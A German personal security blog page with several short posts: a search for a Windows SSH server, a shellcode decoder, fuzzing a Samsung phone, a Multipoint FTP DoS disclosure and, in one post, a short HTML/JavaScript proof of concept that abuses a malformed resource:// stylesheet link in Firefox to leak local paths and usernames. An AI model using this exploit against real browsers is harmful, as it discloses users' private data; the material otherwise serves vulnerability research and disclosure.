SSH-Server für Windows

25 06 2008 23:41
Aktuell setze ich dann und wann den OpenSSH-Server ohne besonderen Namen auf Windows XP ein. :-)

Einen Namen hat der Serverdienst nicht wirklich. Das Projekt dazu befindet sich auf der Webseite sshwindows.sf.net.

Das letzte Update ist von Mitte 2004. Es ist anzunehmen, dass es über die Jahre nicht fehlerfrei geblieben ist. Daher suche ich dafür jetzt endlich eine Alternative, da ich in Zukunft nicht nur ab und zu und auch nicht nur für kurze Zeit den Dienst am Laufen haben möchte, sondern er soll dauerhaft durchlaufen.

Dank Wikipedia bin ich über das Programm freeSSHd gestolpert, was allerdings keine Open Source Software ist, sondern Freeware und neuerdings ein Perl-Exploit für eine noch (immer) nicht geschlossene Sicherheitslücke existiert, welche ich vorhin selber erfolgreich nachvollzogen habe. Somit ist freeSSHd definitiv keine mögliche Alternative.

Darum bitte ich hier um Vorschläge ! (Möglichst OSS, auch wenn das etwas seltsam klingt, wenn man Windows als OS einsetzt.)


Twitter Bookmark SSH-Server für Windows  at del.icio.us Facebook Google Bookmarks FriendFeed Digg SSH-Server für Windows Mixx SSH-Server für Windows Bloglines SSH-Server für Windows Technorati SSH-Server für Windows Fark this: SSH-Server für Windows Bookmark SSH-Server für Windows  at YahooMyWeb Bookmark SSH-Server für Windows  at Furl.net Bookmark SSH-Server für Windows  at reddit.com Bookmark SSH-Server für Windows  at blinklist.com Bookmark SSH-Server für Windows  at Spurl.net Bookmark SSH-Server für Windows  at NewsVine Bookmark SSH-Server für Windows  at Simpy.com Bookmark SSH-Server für Windows  at blogmarks Bookmark SSH-Server für Windows  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Neues Buch: The Web Application Hacker's Handbook

27 12 2007 22:44
Seit heute bin ich stolzer Besitzer eines neuen Buches: "The Web Application Hacker's Handbook" (ISBN-13: 978-0470170779). Geschrieben von den beiden Autoren Dafydd Stuttard und Marcus Pinto. :-)

Ich bin gespannt auf das, was mir in den letzten Jahren u.U. entgangen sein sollte. Hoffentlich nicht viel.

Update: Komplett durchgelesen habe ich das Buch bisher zwar noch nicht, aber es fehlt definitiv die Erwähnung der Header "Range" und "Request-Range". Schließlich lässt sich mit letzterem einiges anstellen.


Twitter Bookmark Neues Buch: The Web Application Hacker's Handbook  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Neues Buch: The Web Application Hacker's Handbook Mixx Neues Buch: The Web Application Hacker's Handbook Bloglines Neues Buch: The Web Application Hacker's Handbook Technorati Neues Buch: The Web Application Hacker's Handbook Fark this: Neues Buch: The Web Application Hacker's Handbook Bookmark Neues Buch: The Web Application Hacker's Handbook  at YahooMyWeb Bookmark Neues Buch: The Web Application Hacker's Handbook  at Furl.net Bookmark Neues Buch: The Web Application Hacker's Handbook  at reddit.com Bookmark Neues Buch: The Web Application Hacker's Handbook  at blinklist.com Bookmark Neues Buch: The Web Application Hacker's Handbook  at Spurl.net Bookmark Neues Buch: The Web Application Hacker's Handbook  at NewsVine Bookmark Neues Buch: The Web Application Hacker's Handbook  at Simpy.com Bookmark Neues Buch: The Web Application Hacker's Handbook  at blogmarks Bookmark Neues Buch: The Web Application Hacker's Handbook  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

SCDC - Shellcode-Decoder

17 11 2007 02:32
Ich habe mir vor einigen Tagen mal schnell die Mühe gemacht und einen Shellcode-Decoder (genauer: die Opcodes darin werden "dekodiert") geschrieben, damit man schnell und einfach einen Einblick in den Shellcode bekommen kann.

Man kann in das Programm quasi irgendeinen Shellcode in der üblichen Form \x?? rein werfen und es kommt etwas besser lesbares wieder heraus.

Das hilft nicht nur beim Penetration-Testing, wenn man genauer nachschauen möchte, ob beim Ausnutzen der Lücke wirklich nur z.B. der obligatorische Taschenrechner auf der Windows-Plattform (warum auch immer ausgerechnet gerade "calc.exe") gestartet wird und nicht noch etwas anderes gemacht wird.

Momentan wird das Programm noch per Copy & Paste und mit der Eingabe von Hand gefüttert. In der nächsten Version kommt dann noch die Verarbeitung von Dateien hinzu. Die Veröffentlichung erfolgt ab diesem Zeitpunkt dann.

Wie man auf dem Screenshot unschwer erkennen kann, gibt es einen Regler für die Transparenz der Anwendung auch auf Nicht-Windows-Vista Betriebssystemen. Normalerweise stehe ich nicht so sehr auf diesen grafischen Firlefanz, aber Transparenz ist hier und da sogar ganz brauchbar. So wie auch hier, wie ich finde.

Update: Dateiverarbeitung ist nun integriert.


Twitter Bookmark SCDC - Shellcode-Decoder  at del.icio.us Facebook Google Bookmarks FriendFeed Digg SCDC - Shellcode-Decoder Mixx SCDC - Shellcode-Decoder Bloglines SCDC - Shellcode-Decoder Technorati SCDC - Shellcode-Decoder Fark this: SCDC - Shellcode-Decoder Bookmark SCDC - Shellcode-Decoder  at YahooMyWeb Bookmark SCDC - Shellcode-Decoder  at Furl.net Bookmark SCDC - Shellcode-Decoder  at reddit.com Bookmark SCDC - Shellcode-Decoder  at blinklist.com Bookmark SCDC - Shellcode-Decoder  at Spurl.net Bookmark SCDC - Shellcode-Decoder  at NewsVine Bookmark SCDC - Shellcode-Decoder  at Simpy.com Bookmark SCDC - Shellcode-Decoder  at blogmarks Bookmark SCDC - Shellcode-Decoder  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Fuzzing Samsung SGH-D600

10 11 2007 14:07
Vorgestern kam mir die spontane Idee mein Handy einmal zu fuzzen. Es sollte allerdings nicht ganz so einfach werden. Abgeschlossen ist diese Sache auch noch nicht.

Eigentlich dachte ich, dass das Kopieren einiger fehlerhafter JPEGs bereits den ein oder anderen Bug beim Betrachten im Handy hervorrufen würde. Jedoch lässt Samsung einen so weit gar nicht erst kommen. Benutzt habe ich das "Samsung PC Studio" zum Übertragen der Dateien.

Hier untersucht das "Samsung PC Studio" vor dem Übertragen die jeweilige Datei auf Korrektheit und bricht den Kopiervorgang u.U. ab. Das betrifft allerdings nur die Standard-Ordner auf dem Handy. Sobald man bspw. fehlerhafte PDF-Dateien in den Ordner "Andere Dateien" kopiert, worauf dann nur der Picsel File Viewer zugreifen kann, klappt der Kopiervorgang allerdings.

Jedoch habe ich das Gefühl, dass der Picsel File Viewer in einer Art Sandbox läuft, weil er ständig nur mit einer Fehlermeldung "Dokument beschädigt" die Anzeige abbricht. Möglicherweise waren es aber auch einfach nur noch nicht genug fehlerhafte PDFs. ;-)

Zurück nochmal zum "Samsung PC Studio":
Da besagte Software die Datei vorfiltert, könnte man vermuten, dass das Handy wahrscheinlich über (z.B.) JPEGs exploitbar ist, weil seitens des Handys kaum bis gar nicht gefiltert wird. Falls man den Weg über das "Samsung PC Studio" gehen will, so müsste dieses erst reverse engineert und entsprechend gepatcht werden oder einfacher: Ein eigenes Programm zur Dateiübertragung per AT-Kommando schreiben.
Was ich auch noch ausprobieren muss, ist der Weg über Bluetooth. Vielleicht lässt sich per OBEX generell viel Arbeit sparen.


Twitter Bookmark Fuzzing Samsung SGH-D600  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Fuzzing Samsung SGH-D600 Mixx Fuzzing Samsung SGH-D600 Bloglines Fuzzing Samsung SGH-D600 Technorati Fuzzing Samsung SGH-D600 Fark this: Fuzzing Samsung SGH-D600 Bookmark Fuzzing Samsung SGH-D600  at YahooMyWeb Bookmark Fuzzing Samsung SGH-D600  at Furl.net Bookmark Fuzzing Samsung SGH-D600  at reddit.com Bookmark Fuzzing Samsung SGH-D600  at blinklist.com Bookmark Fuzzing Samsung SGH-D600  at Spurl.net Bookmark Fuzzing Samsung SGH-D600  at NewsVine Bookmark Fuzzing Samsung SGH-D600  at Simpy.com Bookmark Fuzzing Samsung SGH-D600  at blogmarks Bookmark Fuzzing Samsung SGH-D600  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Multipoint 0.9.4b anfällig für DoS-Attacken

28 10 2007 19:59
Die FTP-Server Software "Multipoint 0.9.4b" ist anfällig für DoS-Attacken über das FTP-Protokoll (Control Port).

U.U. lässt sich dieser Bug auch für eine Remote Code Execution ausnutzen. Da der FTP-Server (ftpserver.exe) mit System-Rechten läuft, wäre dieser Umstand fatal.


Twitter Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Multipoint 0.9.4b anfällig für DoS-Attacken Mixx Multipoint 0.9.4b anfällig für DoS-Attacken Bloglines Multipoint 0.9.4b anfällig für DoS-Attacken Technorati Multipoint 0.9.4b anfällig für DoS-Attacken Fark this: Multipoint 0.9.4b anfällig für DoS-Attacken Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at YahooMyWeb Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at Furl.net Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at reddit.com Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at blinklist.com Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at Spurl.net Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at NewsVine Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at Simpy.com Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  at blogmarks Bookmark Multipoint 0.9.4b anfällig für DoS-Attacken  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Wie man Firefox Daten entlockt

17 05 2007 13:53
Bislang funktioniert es leider nur lokal, aber dies lässt sich vielleicht noch abändern.
So wäre zumindest unter Windows möglich die Benutzernamen auszulesen und ein Fingerprinting der installierten Software vorzunehmen.

PoC:

<link rel="stylesheet" href="res%6Furce://..%5C" type="text/css" id="path">
<script>
alert(document.getElementById("path").sheet.href);
</script>

Update: So wie es aussieht wird der dieser Bug in Firefox 2.0.0.4 und 1.5.0.12 behoben sein.

Update 2: So funktioniert es auch von extern, anstatt nur lokal. Allerdings kann nur auf vorher bekannte Benutzernamen getestet werden, anstatt nur die vorhandenen auszulesen.


Twitter Bookmark Wie man Firefox Daten entlockt  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Wie man Firefox Daten entlockt Mixx Wie man Firefox Daten entlockt Bloglines Wie man Firefox Daten entlockt Technorati Wie man Firefox Daten entlockt Fark this: Wie man Firefox Daten entlockt Bookmark Wie man Firefox Daten entlockt  at YahooMyWeb Bookmark Wie man Firefox Daten entlockt  at Furl.net Bookmark Wie man Firefox Daten entlockt  at reddit.com Bookmark Wie man Firefox Daten entlockt  at blinklist.com Bookmark Wie man Firefox Daten entlockt  at Spurl.net Bookmark Wie man Firefox Daten entlockt  at NewsVine Bookmark Wie man Firefox Daten entlockt  at Simpy.com Bookmark Wie man Firefox Daten entlockt  at blogmarks Bookmark Wie man Firefox Daten entlockt  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca

Wie man Spam per E-Mail nicht verhindert

28 04 2007 13:07
Um sich gegen Spam zu rüsten, verwenden viele Leute keine klickbaren Links mehr und verschleiern ihre E-Mail-Adresse auch dann, wenn sie nur reiner Text ist. [a] [at] (a) etc. kennt man ja.

Allerdings scheint dies jemand bei der Zero Day Initiative nicht ganz verstanden zu haben. Anders kann ich mir das jetzt nicht wirklich erklären (der kleine rot umrahmte Ausschnitt zeigt den Inhalt der Statuszeile - also den Verweis):


Twitter Bookmark Wie man Spam per E-Mail nicht verhindert  at del.icio.us Facebook Google Bookmarks FriendFeed Digg Wie man Spam per E-Mail nicht verhindert Mixx Wie man Spam per E-Mail nicht verhindert Bloglines Wie man Spam per E-Mail nicht verhindert Technorati Wie man Spam per E-Mail nicht verhindert Fark this: Wie man Spam per E-Mail nicht verhindert Bookmark Wie man Spam per E-Mail nicht verhindert  at YahooMyWeb Bookmark Wie man Spam per E-Mail nicht verhindert  at Furl.net Bookmark Wie man Spam per E-Mail nicht verhindert  at reddit.com Bookmark Wie man Spam per E-Mail nicht verhindert  at blinklist.com Bookmark Wie man Spam per E-Mail nicht verhindert  at Spurl.net Bookmark Wie man Spam per E-Mail nicht verhindert  at NewsVine Bookmark Wie man Spam per E-Mail nicht verhindert  at Simpy.com Bookmark Wie man Spam per E-Mail nicht verhindert  at blogmarks Bookmark Wie man Spam per E-Mail nicht verhindert  with wists wong it! Bookmark using any bookmark manager! Stumble It! Print this article! E-mail this story to a friend! Identi.ca